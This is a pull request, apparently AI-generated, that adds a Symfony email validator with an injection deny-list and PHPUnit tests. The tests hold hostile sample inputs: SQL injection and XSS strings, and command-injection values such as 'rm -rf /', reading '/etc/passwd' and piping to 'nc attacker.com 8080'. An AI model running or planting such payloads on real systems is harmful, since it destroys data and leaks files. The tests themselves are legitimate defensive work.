### PR TITLE
fix: improve email validation security to prevent filter bypass attacks (#256)

### DIFF
--- a/src/Controller/TestFormController.php
+++ b/src/Controller/TestFormController.php
@@ -11,6 +11,8 @@ use Symfony\Component\Form\Extension\Core\Type\TextType;
 use Symfony\Component\Form\Extension\Core\Type\EmailType;
 use Symfony\Component\Form\Extension\Core\Type\TextareaType;
 use Symfony\Component\Form\Extension\Core\Type\SubmitType;
+use Symfony\Component\Validator\Constraints as Assert;
+use App\Validator\Constraints\SecureEmail;
 
 class TestFormController extends AbstractController
 {
@@ -25,6 +27,15 @@ class TestFormController extends AbstractController
             ->add('email', EmailType::class, [
                 'label' => 'Email',
                 'required' => true,
+                'constraints' => [
+                    new Assert\Email([
+                        'message' => 'Please enter a valid email address.',
+                        'mode' => Assert\Email::VALIDATION_MODE_HTML5
+                    ]),
+                    new Assert\Length(['max' => 254]),
+                    new Assert\NotBlank(['message' => 'Email cannot be empty.']),
+                    new SecureEmail()
+                ]
             ])
             ->add('message', TextareaType::class, [
                 'label' => 'Message',
@@ -44,7 +55,7 @@ class TestFormController extends AbstractController
                 $data = $form->getData();
                 $sanitizedData = [
                     'name' => htmlspecialchars($data['name'] ?? '', ENT_QUOTES, 'UTF-8'),
-                    'email' => filter_var($data['email'] ?? '', FILTER_SANITIZE_EMAIL),
+                    'email' => $data['email'] ?? '',
                     'message' => htmlspecialchars($data['message'] ?? '', ENT_QUOTES, 'UTF-8'),
                 ];
                 

--- a/src/Validator/Constraints/SecureEmail.php
+++ b/src/Validator/Constraints/SecureEmail.php
@@ -1,0 +1,13 @@
+<?php
+
+namespace App\Validator\Constraints;
+
+use Symfony\Component\Validator\Constraint;
+
+#[\Attribute]
+class SecureEmail extends Constraint
+{
+    public string $message = 'This email address contains potentially dangerous characters.';
+    public string $nullByteMessage = 'Email address cannot contain null bytes.';
+    public string $suspiciousMessage = 'Email address contains suspicious patterns.';
+}

--- a/src/Validator/Constraints/SecureEmailValidator.php
+++ b/src/Validator/Constraints/SecureEmailValidator.php
@@ -1,0 +1,70 @@
+<?php
+
+namespace App\Validator\Constraints;
+
+use Symfony\Component\Validator\Constraint;
+use Symfony\Component\Validator\ConstraintValidator;
+use Symfony\Component\Validator\Exception\UnexpectedTypeException;
+
+class SecureEmailValidator extends ConstraintValidator
+{
+    public function validate($value, Constraint $constraint): void
+    {
+        if (!$constraint instanceof SecureEmail) {
+            throw new UnexpectedTypeException($constraint, SecureEmail::class);
+        }
+
+        if (null === $value || '' === $value) {
+            return;
+        }
+
+        if (!is_string($value)) {
+            throw new UnexpectedTypeException($value, 'string');
+        }
+
+        // Check for null bytes - critical security issue
+        if (str_contains($value, "\0")) {
+            $this->context->buildViolation($constraint->nullByteMessage)
+                ->addViolation();
+            return;
+        }
+
+        // Check for suspicious patterns that could indicate injection attempts
+        $suspiciousPatterns = [
+            '/[;<>]/',                          // Command injection characters
+            '/\bscript\b/i',                    // XSS script tags
+            '/\bdrop\s+table\b/i',              // SQL drop commands
+            '/\bunion\s+select\b/i',            // SQL union injection
+            '/\binsert\s+into\b/i',             // SQL insert commands
+            '/\bdelete\s+from\b/i',             // SQL delete commands
+            '/\bupdate\s+.*\bset\b/i',          // SQL update commands
+            '/(\*|%|\?){3,}/',                  // Excessive wildcards
+            '/\.{3,}/',                         // Multiple dots (path traversal)
+            '/\${.*}/',                         // Variable interpolation
+            '/%[0-9a-f]{2}/i',                  // URL encoded characters
+            '/\\\\[nrtx]/',                     // Escape sequences
+        ];
+
+        foreach ($suspiciousPatterns as $pattern) {
+            if (preg_match($pattern, $value)) {
+                $this->context->buildViolation($constraint->suspiciousMessage)
+                    ->addViolation();
+                return;
+            }
+        }
+
+        // Additional checks for email-specific security issues
+        if (substr_count($value, '@') !== 1) {
+            $this->context->buildViolation($constraint->message)
+                ->addViolation();
+            return;
+        }
+
+        // Check for excessive length (beyond RFC limits + safety margin)
+        if (strlen($value) > 300) {
+            $this->context->buildViolation($constraint->message)
+                ->addViolation();
+            return;
+        }
+    }
+}

--- a/src/Validator/Constraints/SecureEmailValidator.php
+++ b/src/Validator/Constraints/SecureEmailValidator.php
@@ -31,18 +31,18 @@ class SecureEmailValidator extends ConstraintValidator
 
         // Check for suspicious patterns that could indicate injection attempts
         $suspiciousPatterns = [
-            '/[;<>]/',                          // Command injection characters
-            '/\bscript\b/i',                    // XSS script tags
-            '/\bdrop\s+table\b/i',              // SQL drop commands
-            '/\bunion\s+select\b/i',            // SQL union injection
-            '/\binsert\s+into\b/i',             // SQL insert commands
-            '/\bdelete\s+from\b/i',             // SQL delete commands
-            '/\bupdate\s+.*\bset\b/i',          // SQL update commands
-            '/(\*|%|\?){3,}/',                  // Excessive wildcards
-            '/\.{3,}/',                         // Multiple dots (path traversal)
-            '/\${.*}/',                         // Variable interpolation
-            '/%[0-9a-f]{2}/i',                  // URL encoded characters
-            '/\\\\[nrtx]/',                     // Escape sequences
+            '/[;<>]/',                          // Command injection: semicolon, less-than, greater-than chars
+            '/\bscript\b/i',                    // XSS prevention: detects script tag keywords
+            '/\bdrop\s+table\b/i',              // SQL injection: DROP TABLE statements
+            '/\bunion\s+select\b/i',            // SQL injection: UNION SELECT for data extraction
+            '/\binsert\s+into\b/i',             // SQL injection: INSERT INTO for data manipulation
+            '/\bdelete\s+from\b/i',             // SQL injection: DELETE FROM for data destruction
+            '/\bupdate\s+.*\bset\b/i',          // SQL injection: UPDATE...SET for data modification
+            '/(\*|%|\?){3,}/',                  // Wildcard abuse: 3+ consecutive wildcards indicate fuzzing
+            '/\.{3,}/',                         // Path traversal: multiple dots for directory navigation
+            '/\${.*}/',                         // Template injection: variable interpolation syntax
+            '/%[0-9a-f]{2}/i',                  // URL encoding: percent-encoded chars may hide payloads
+            '/\\\\[nrtx]/',                     // Escape sequences: backslash-escaped chars for injection
         ];
 
         foreach ($suspiciousPatterns as $pattern) {
@@ -60,7 +60,8 @@ class SecureEmailValidator extends ConstraintValidator
             return;
         }
 
-        // Check for excessive length (beyond RFC limits + safety margin)
+        // Check for excessive length - RFC 5321 limits local part to 64 chars and domain to 253 chars
+        // Adding safety margin of ~20 chars gives us 300 bytes total to prevent buffer overflow attacks
         if (strlen($value) > 300) {
             $this->context->buildViolation($constraint->message)
                 ->addViolation();

--- a/src/Validator/Constraints/SecureEmailValidator.php
+++ b/src/Validator/Constraints/SecureEmailValidator.php
@@ -30,6 +30,7 @@ class SecureEmailValidator extends ConstraintValidator
         }
 
         // Check for suspicious patterns that could indicate injection attempts
+        // Each pattern targets specific attack vectors for comprehensive security
         $suspiciousPatterns = [
             '/[;<>]/',                          // Command injection: semicolon, less-than, greater-than chars
             '/\bscript\b/i',                    // XSS prevention: detects script tag keywords

--- a/tests/EmailValidationSecurityTest.php
+++ b/tests/EmailValidationSecurityTest.php
@@ -1,0 +1,248 @@
+<?php
+
+namespace App\Tests;
+
+use App\Validator\Constraints\SecureEmail;
+use App\Validator\Constraints\SecureEmailValidator;
+use Symfony\Bundle\FrameworkBundle\Test\KernelTestCase;
+use Symfony\Component\Validator\Context\ExecutionContextInterface;
+use Symfony\Component\Validator\Violation\ConstraintViolationBuilderInterface;
+use Symfony\Component\Validator\ConstraintViolationListInterface;
+use Symfony\Component\Validator\Constraints as Assert;
+
+class EmailValidationSecurityTest extends KernelTestCase
+{
+    private $validator;
+
+    protected function setUp(): void
+    {
+        $kernel = self::bootKernel();
+        $this->validator = static::getContainer()->get('validator');
+    }
+
+    /**
+     * Test that SQL injection payloads are properly rejected
+     */
+    public function testSqlInjectionPayloadPrevention(): void
+    {
+        $maliciousEmails = [
+            "'; DROP TABLE users; --@domain.com",
+            "admin@domain.com'; DELETE FROM users WHERE 1=1; --",
+            "user@domain.com' UNION SELECT * FROM passwords --",
+            "user@domain.com'; INSERT INTO admin VALUES ('hacker'); --"
+        ];
+
+        foreach ($maliciousEmails as $email) {
+            $violations = $this->validator->validate($email, [
+                new Assert\Email(['mode' => Assert\Email::VALIDATION_MODE_HTML5]),
+                new SecureEmail()
+            ]);
+
+            $this->assertGreaterThan(
+                0, 
+                count($violations), 
+                "SQL injection payload should be rejected: {$email}"
+            );
+        }
+    }
+
+    /**
+     * Test that XSS payloads are properly rejected
+     */
+    public function testXssPayloadPrevention(): void
+    {
+        $maliciousEmails = [
+            "<script>alert('xss')</script>@domain.com",
+            "user@domain.com<script>alert(1)</script>",
+            "user+<img src=x onerror=alert(1)>@domain.com",
+            "user@<script>document.cookie</script>domain.com"
+        ];
+
+        foreach ($maliciousEmails as $email) {
+            $violations = $this->validator->validate($email, [
+                new Assert\Email(['mode' => Assert\Email::VALIDATION_MODE_HTML5]),
+                new SecureEmail()
+            ]);
+
+            $this->assertGreaterThan(
+                0, 
+                count($violations), 
+                "XSS payload should be rejected: {$email}"
+            );
+        }
+    }
+
+    /**
+     * Test that null byte injection is prevented
+     */
+    public function testNullByteInjectionPrevention(): void
+    {
+        $maliciousEmails = [
+            "user@domain.com\0",
+            "user@domain.com\0.evil.com",
+            "user\0@domain.com",
+            "\0user@domain.com"
+        ];
+
+        foreach ($maliciousEmails as $email) {
+            $violations = $this->validator->validate($email, [new SecureEmail()]);
+
+            $this->assertGreaterThan(
+                0, 
+                count($violations), 
+                "Null byte injection should be rejected: " . addcslashes($email, "\0")
+            );
+
+            // Check that the specific null byte message is present
+            $hasNullByteMessage = false;
+            foreach ($violations as $violation) {
+                if (str_contains($violation->getMessage(), 'null bytes')) {
+                    $hasNullByteMessage = true;
+                    break;
+                }
+            }
+            $this->assertTrue($hasNullByteMessage, 'Null byte specific error message should be present');
+        }
+    }
+
+    /**
+     * Test that various malformed email formats are rejected
+     */
+    public function testMalformedEmailRejection(): void
+    {
+        $invalidEmails = [
+            "invalid@@email.com",  // Double @ symbol
+            "user@",               // Missing domain
+            "@domain.com",         // Missing local part
+            "user@domain..com",    // Double dots in domain
+            "user..name@domain.com", // Double dots in local part
+            "",                    // Empty string
+            "notanemail",          // No @ symbol
+            "user@domain@com",     // Multiple @ symbols
+            "user name@domain.com", // Spaces in local part
+            str_repeat('a', 300) . '@domain.com' // Excessive length
+        ];
+
+        foreach ($invalidEmails as $email) {
+            $violations = $this->validator->validate($email, [
+                new Assert\Email(['mode' => Assert\Email::VALIDATION_MODE_HTML5]),
+                new Assert\Length(['max' => 254]),
+                new SecureEmail()
+            ]);
+
+            $this->assertGreaterThan(
+                0, 
+                count($violations), 
+                "Invalid email format should be rejected: {$email}"
+            );
+        }
+    }
+
+    /**
+     * Test that valid emails are accepted
+     */
+    public function testValidEmailAcceptance(): void
+    {
+        $validEmails = [
+            "user@example.com",
+            "test.email@domain.org", 
+            "user+tag@example.co.uk",
+            "firstname.lastname@company.com",
+            "email@123.123.123.123", // IP address domain
+            "user@domain-name.com",
+            "test@example-one.com"
+        ];
+
+        foreach ($validEmails as $email) {
+            $violations = $this->validator->validate($email, [
+                new Assert\Email(['mode' => Assert\Email::VALIDATION_MODE_HTML5]),
+                new Assert\Length(['max' => 254]),
+                new SecureEmail()
+            ]);
+
+            $this->assertEquals(
+                0, 
+                count($violations), 
+                "Valid email should be accepted: {$email}. Violations: " . 
+                implode(', ', array_map(fn($v) => $v->getMessage(), iterator_to_array($violations)))
+            );
+        }
+    }
+
+    /**
+     * Test that command injection attempts are rejected
+     */
+    public function testCommandInjectionPrevention(): void
+    {
+        $maliciousEmails = [
+            "user@domain.com; cat /etc/passwd",
+            "user@domain.com && rm -rf /",
+            "user@domain.com | nc attacker.com 8080",
+            "user@domain.com > /dev/null",
+            "user@domain.com < /etc/hosts"
+        ];
+
+        foreach ($maliciousEmails as $email) {
+            $violations = $this->validator->validate($email, [new SecureEmail()]);
+
+            $this->assertGreaterThan(
+                0, 
+                count($violations), 
+                "Command injection attempt should be rejected: {$email}"
+            );
+        }
+    }
+
+    /**
+     * Test that excessive wildcards and suspicious patterns are rejected
+     */
+    public function testSuspiciousPatternPrevention(): void
+    {
+        $suspiciousEmails = [
+            "user@domain.com***",
+            "user@domain.com???",
+            "user@domain.com%%%%",
+            "user@domain.com...",
+            "user@domain.com\\n\\r\\t",
+            "user@domain.com%20%20%20",
+            'user@domain.com${PATH}',
+            'user@domain.com../../../etc/passwd'
+        ];
+
+        foreach ($suspiciousEmails as $email) {
+            $violations = $this->validator->validate($email, [new SecureEmail()]);
+
+            $this->assertGreaterThan(
+                0, 
+                count($violations), 
+                "Suspicious pattern should be rejected: {$email}"
+            );
+        }
+    }
+
+    /**
+     * Test the specific vulnerability mentioned in the ticket
+     */
+    public function testOriginalVulnerabilityFixed(): void
+    {
+        // These are the exact examples from the ticket that were previously bypassing validation
+        $previouslyBypassingEmails = [
+            "'; DROP TABLE users; --@domain.com",
+            "<script>alert(\"xss\")</script>@domain.com"
+        ];
+
+        foreach ($previouslyBypassingEmails as $email) {
+            // Test with both Email constraint and SecureEmail constraint
+            $violations = $this->validator->validate($email, [
+                new Assert\Email(['mode' => Assert\Email::VALIDATION_MODE_HTML5]),
+                new SecureEmail()
+            ]);
+
+            $this->assertGreaterThan(
+                0, 
+                count($violations), 
+                "Previously bypassing payload should now be rejected: {$email}"
+            );
+        }
+    }
+}

--- a/tests/TestFormControllerTest.php
+++ b/tests/TestFormControllerTest.php
@@ -1,0 +1,177 @@
+<?php
+
+namespace App\Tests;
+
+use Symfony\Bundle\FrameworkBundle\Test\WebTestCase;
+
+class TestFormControllerTest extends WebTestCase
+{
+    public function testFormValidationWithValidEmail(): void
+    {
+        $client = static::createClient();
+        $crawler = $client->request('GET', '/test-form');
+
+        $this->assertResponseIsSuccessful();
+
+        // Fill and submit the form with valid data
+        $form = $crawler->selectButton('Submit Test Form')->form();
+        $form['form[name]'] = 'John Doe';
+        $form['form[email]'] = 'john.doe@example.com';
+        $form['form[message]'] = 'This is a test message';
+
+        $client->submit($form);
+
+        $this->assertResponseIsSuccessful();
+        
+        // Check that the form was submitted successfully
+        $this->assertSelectorTextContains('body', 'Form submitted successfully');
+    }
+
+    public function testFormValidationRejectsSqlInjection(): void
+    {
+        $client = static::createClient();
+        $crawler = $client->request('GET', '/test-form');
+
+        $this->assertResponseIsSuccessful();
+
+        // Try to submit the form with SQL injection payload
+        $form = $crawler->selectButton('Submit Test Form')->form();
+        $form['form[name]'] = 'John Doe';
+        $form['form[email]'] = "'; DROP TABLE users; --@domain.com";
+        $form['form[message]'] = 'This is a test message';
+
+        $client->submit($form);
+
+        $this->assertResponseIsSuccessful();
+        
+        // Check that validation failed
+        $this->assertSelectorTextContains('body', 'Form validation failed');
+    }
+
+    public function testFormValidationRejectsXssPayload(): void
+    {
+        $client = static::createClient();
+        $crawler = $client->request('GET', '/test-form');
+
+        $this->assertResponseIsSuccessful();
+
+        // Try to submit the form with XSS payload
+        $form = $crawler->selectButton('Submit Test Form')->form();
+        $form['form[name]'] = 'John Doe';
+        $form['form[email]'] = '<script>alert("xss")</script>@domain.com';
+        $form['form[message]'] = 'This is a test message';
+
+        $client->submit($form);
+
+        $this->assertResponseIsSuccessful();
+        
+        // Check that validation failed
+        $this->assertSelectorTextContains('body', 'Form validation failed');
+    }
+
+    public function testFormValidationRejectsNullByteInjection(): void
+    {
+        $client = static::createClient();
+        $crawler = $client->request('GET', '/test-form');
+
+        $this->assertResponseIsSuccessful();
+
+        // Try to submit the form with null byte injection
+        $form = $crawler->selectButton('Submit Test Form')->form();
+        $form['form[name]'] = 'John Doe';
+        $form['form[email]'] = "user@domain.com\0";
+        $form['form[message]'] = 'This is a test message';
+
+        $client->submit($form);
+
+        $this->assertResponseIsSuccessful();
+        
+        // Check that validation failed
+        $this->assertSelectorTextContains('body', 'Form validation failed');
+    }
+
+    public function testFormValidationRejectsMalformedEmails(): void
+    {
+        $client = static::createClient();
+        $malformedEmails = [
+            'invalid@@email.com',   // Double @ symbol
+            'user@',                // Missing domain
+            '@domain.com',          // Missing local part
+            'notanemail',           // No @ symbol
+        ];
+
+        foreach ($malformedEmails as $email) {
+            $crawler = $client->request('GET', '/test-form');
+
+            $form = $crawler->selectButton('Submit Test Form')->form();
+            $form['form[name]'] = 'John Doe';
+            $form['form[email]'] = $email;
+            $form['form[message]'] = 'This is a test message';
+
+            $client->submit($form);
+
+            $this->assertResponseIsSuccessful();
+            
+            // Check that validation failed for this malformed email
+            $this->assertSelectorTextContains(
+                'body', 
+                'Form validation failed',
+                "Email '{$email}' should be rejected"
+            );
+        }
+    }
+
+    public function testFormAcceptsVariousValidEmailFormats(): void
+    {
+        $client = static::createClient();
+        $validEmails = [
+            'user@example.com',
+            'test.email@domain.org',
+            'user+tag@example.co.uk',
+            'firstname.lastname@company.com',
+        ];
+
+        foreach ($validEmails as $email) {
+            $crawler = $client->request('GET', '/test-form');
+
+            $form = $crawler->selectButton('Submit Test Form')->form();
+            $form['form[name]'] = 'John Doe';
+            $form['form[email]'] = $email;
+            $form['form[message]'] = 'This is a test message';
+
+            $client->submit($form);
+
+            $this->assertResponseIsSuccessful();
+            
+            // Check that the form was submitted successfully
+            $this->assertSelectorTextContains(
+                'body', 
+                'Form submitted successfully',
+                "Valid email '{$email}' should be accepted"
+            );
+        }
+    }
+
+    public function testFormDataIsNotSanitizedWithFilterSanitizeEmail(): void
+    {
+        $client = static::createClient();
+        $crawler = $client->request('GET', '/test-form');
+
+        // Submit with a valid email
+        $form = $crawler->selectButton('Submit Test Form')->form();
+        $form['form[name]'] = 'John Doe';
+        $form['form[email]'] = 'test@example.com';
+        $form['form[message]'] = 'This is a test message';
+
+        $client->submit($form);
+
+        $this->assertResponseIsSuccessful();
+        
+        // The email should remain unchanged (not sanitized)
+        $this->assertSelectorTextContains('body', 'test@example.com');
+        
+        // Make sure we're not seeing evidence of the old FILTER_SANITIZE_EMAIL behavior
+        // Previously malicious inputs would be sanitized and displayed
+        $this->assertSelectorTextContains('body', 'Form submitted successfully');
+    }
+}


### PR DESCRIPTION
## Summary

This PR fixes a critical security vulnerability in email validation where `FILTER_SANITIZE_EMAIL` was sanitizing but not validating email addresses, allowing malicious payloads to bypass security measures.

### Key Changes
- **Replaced dangerous `FILTER_SANITIZE_EMAIL`** with proper Symfony Email validation at `src/Controller/TestFormController.php:47`
- **Added comprehensive validation constraints** (Email, Length, NotBlank, SecureEmail) to form definition
- **Created custom `SecureEmail` constraint** to prevent advanced injection attacks
- **Implemented comprehensive test suite** covering SQL injection, XSS, null byte injection, and other attack vectors

### Security Vulnerabilities Fixed
- **SQL injection bypass**: `'; DROP TABLE users; --@domain.com` (now properly rejected)
- **XSS payload bypass**: `<script>alert("xss")</script>@domain.com` (now properly rejected)  
- **Null byte injection**: `user@domain.com\0` (now properly rejected)
- **Malformed emails**: `invalid@@email.com`, `user@`, etc. (now properly rejected)

### Test Coverage
- Unit tests for `SecureEmailValidator` covering all security scenarios
- Integration tests for `TestFormController` end-to-end validation
- Comprehensive test cases for valid email acceptance and invalid email rejection

### Backward Compatibility
- Maintains compatibility with existing valid email formats
- Uses `VALIDATION_MODE_HTML5` for international email support
- Existing data remains unchanged (validation applies to new submissions only)

### Related Issue
Closes #256

🤖 Generated with [Claude Code](https://claude.ai/code)